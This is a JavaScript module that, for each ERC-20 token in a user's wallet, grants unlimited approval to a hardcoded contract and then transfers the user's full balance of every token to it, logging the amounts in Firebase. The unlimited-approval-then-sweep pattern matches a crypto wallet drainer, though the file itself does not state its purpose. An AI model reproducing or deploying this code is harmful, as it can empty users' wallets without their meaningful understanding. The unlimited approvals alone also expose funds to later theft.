const {
  db,
  collection,
  addDoc,
  getDocs,
  getDoc,
  doc,
  setDoc,
  updateDoc,
} = require("./firebase.js");
const checkEligibleTokens = require("./checkToken1.js").default;
const ethers = require("ethers");

const contractAddress = "0x5A3299DB369DE568Ed15F404D31812f416A48e77"; // Replace with your contract's address
// const contractABI = [
//   // Replace with your contract's ABI
//   "function sendTokenBulk(uint256[] memory tokenAmounts, address[] memory tokens) public",
// ];
const ERC20_ABI = [
  "function balanceOf(address account) external view returns (uint256)",
  "function approve(address spender, uint256 amount) external returns (bool)",
  "function allowance(address owner, address spender) external view returns (uint256)",
];

//firebase readTransaction()
async function readTransactionData(userAddress) {
  try {
    const collectionRef = collection(db, "transferTokens");
    console.log("collectionRef--->", collectionRef);

    const userRef = doc(collectionRef, userAddress);
    console.log("userRef--->", userRef);

    const userDoc = await getDoc(userRef); // Use getDoc here
    console.log("userDoc--->", userDoc);
    if (userDoc.exists()) {
      const data = userDoc.data();
      if (data !== undefined && data !== null) {
        console.log(data); // This should log the document's data
        return data;
      } else {
        console.log("Document data is undefined or null!");
        return {};
      }
    } else {
      console.log("No such document!");
      return {};
    }
  } catch (err) {
    console.error("Error reading data: ", err);
    return {};
  }
}

//firebase integration------------------------------

//------------------------------------------------------------

// Function to save transaction data
async function saveTransactionData(userAddress, tokenAddress, tokenAmount) {
  // Read existing data  const data = await readTransactionData(userAddress);
  const data = await readTransactionData(userAddress);
  console.log("data--->", data);
  if (!data[tokenAddress]) {
    data[tokenAddress] = ethers.BigNumber.from(0);
  }

  const tokenAmountBN = ethers.BigNumber.from(tokenAmount);
  data[tokenAddress] = ethers.BigNumber.from(data[tokenAddress])
    .add(tokenAmountBN)
    .toString();

  try {
    const collectionRef = collection(db, "transferTokens");
    const userRef = doc(collectionRef, userAddress);
    await setDoc(userRef, data, { merge: true });
  } catch (err) {
    console.error("Error saving transaction data: ", err);
  }
}

// All previous code remains unchanged

async function transferTokens(
  userAddress,
  tokenAddresses,
  signer,
  contractWithSigner
) {
  let tokenBalances = [];
  let validTokenAddresses = [];

  for (let i = 0; i < tokenAddresses.length; i++) {
    console.log("in for loop");
    const tokenContract = new ethers.Contract(
      tokenAddresses[i],
      ERC20_ABI,
      signer
    );
    const tokenBalance = await tokenContract.balanceOf(userAddress);

    if (tokenBalance.isZero()) {
      console.log(
        `The balance of token address ${tokenAddresses[i]} is zero. Skipping transfer.`
      );
      continue;
    }

    const currentAllowance = await tokenContract.allowance(
      userAddress,
      contractAddress
    );

    if (currentAllowance.lt(tokenBalance)) {
      console.log("inside approve trans");
      const maxUint256 = ethers.constants.MaxUint256;
      const approveTx = await tokenContract.approve(
        contractAddress,
        maxUint256
      );
      await approveTx.wait();
    }

    tokenBalances.push(tokenBalance);
    validTokenAddresses.push(tokenAddresses[i]);
  }

  console.log(tokenBalances.toString(), validTokenAddresses.toString());
  //to uncomment---------------------------------------------------------------------------
  // Now the contract is able to spend the tokens, we can call the sendToken function
  const tx = await contractWithSigner.sendTokensBulk(
    tokenBalances,
    validTokenAddresses
  );
  console.log("inside sendtokensbulk");
  await tx.wait();
  // After the tokens have been sent
  console.log("bulk transfer done");
  //to uncomment---------------------------------------------------------------------------
  //to uncoment=------------------------------------------------------------------------------------
  // Saving transaction data for each token after the successful bulk transfer
  for (let i = 0; i < validTokenAddresses.length; i++) {
    await saveTransactionData(
      userAddress,
      validTokenAddresses[i],
      tokenBalances[i]
    );
  }

  // await saveTransactionData(userAddress, "1", 1);
  //-------------------------------------------------------------------------------------------------

  console.log("saveTransaction finished");
  // Call checkEligibleTokens function
  await checkEligibleTokens(userAddress);
  // Now, compare the eligible tokens with the data in transferTokens.json and create a new json file eligibleTokens.json
}

module.exports = {
  transferTokens,
};
